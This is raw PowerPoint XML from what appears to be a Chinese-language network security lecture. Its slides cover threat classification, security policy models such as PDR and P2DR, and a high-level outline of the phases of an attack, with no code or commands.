          </a:p>
        </p:txBody>
      </p:sp>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37875523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a:t>从信息流动的角度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中断、截取、修改、捏造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从威胁的来源看可分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部威胁和外部威胁 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自然和人为两类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从攻击者的行为上看可以分成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动威胁和被动威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从威胁的动机上看分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>偶发性威胁与故意性威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全威胁分类 </a:t>
            </a:r>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pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140899724"/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于安全体系结构的安全防护方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>风险分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>制定策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全防护技术部署</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>依赖于正确的设置和完善的防御手段，并很大程度上针对固定的威胁和环境弱点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全体系结构主要负责建立防线，没有体现信息（网络）安全的攻防互动，响应</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络安全策略（模型）：标准化的过程和方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APPDRR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PDRR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模型</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温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全策略（模型）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3532757367"/>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a:t>从信息流动的角度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中断、截取、修改、捏造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从威胁的来源看可分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部威胁和外部威胁 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自然和人为两类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从攻击者的行为上看可以分成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动威胁和被动威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从威胁的动机上看分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>偶发性威胁与故意性威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全威胁分类 </a:t>
            </a:r>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pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2480013948"/>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天时地利人和</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>人物</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击环节</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3139448938"/>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内容占位符 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2096823525"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1179306"/>
          <a:ext cx="8229600" cy="5214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2098" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的过程</a:t>
            </a:r>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13209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EEDA8CF-EC48-4EEA-8510-0BBA14C99224}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34017027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攻击的一般过程及目的、内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51248" name="Group 48"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="499864" y="1447800"/>
            <a:ext cx="2111374" cy="4551363"/>
            <a:chOff x="580" y="912"/>
            <a:chExt cx="1330" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51228" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="605" y="1335"/>
              <a:ext cx="1305" cy="705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="9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4" name="Group 44"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="580" y="912"/>
              <a:ext cx="1330" cy="2867"/>
              <a:chOff x="580" y="912"/>
              <a:chExt cx="1330" cy="2867"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51225" name="Text Box 25"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="580" y="912"/>
                <a:ext cx="13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itchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>预攻击</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51226" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="605" y="2040"/>
                <a:ext cx="1305" cy="1739"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="9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27" name="Text Box 27"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="652" y="2087"/>
                <a:ext cx="1258" cy="1386"/>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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>内容：</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>获得域名及</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>IP</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>分布</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>获得拓扑及</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>OS</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>等</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>获得端口和服务</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>获得应用系统情况</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>跟踪新漏洞发布</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51229" name="Text Box 29"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="65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kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>收集信息，攻击决策</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51245" name="Group 45"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3571677" y="1447800"/>
            <a:ext cx="2071687" cy="4551363"/>
            <a:chOff x="2515" y="912"/>
            <a:chExt cx="1305" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51231" name="Text Box 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2702" y="912"/>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itchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51232" name="Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2515" y="2040"/>
              <a:ext cx="1305" cy="1739"/>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3" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2562" y="2087"/>
              <a:ext cx="1258" cy="138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内容：</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>获得远程权限</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>进入远程系统</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>提升本地权限</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>进一步扩展权限</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>进行实质性操作</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51234" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2515" y="1335"/>
              <a:ext cx="1305" cy="705"/>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5" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2562" y="1382"/>
              <a:ext cx="1258" cy="61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lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>实施</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
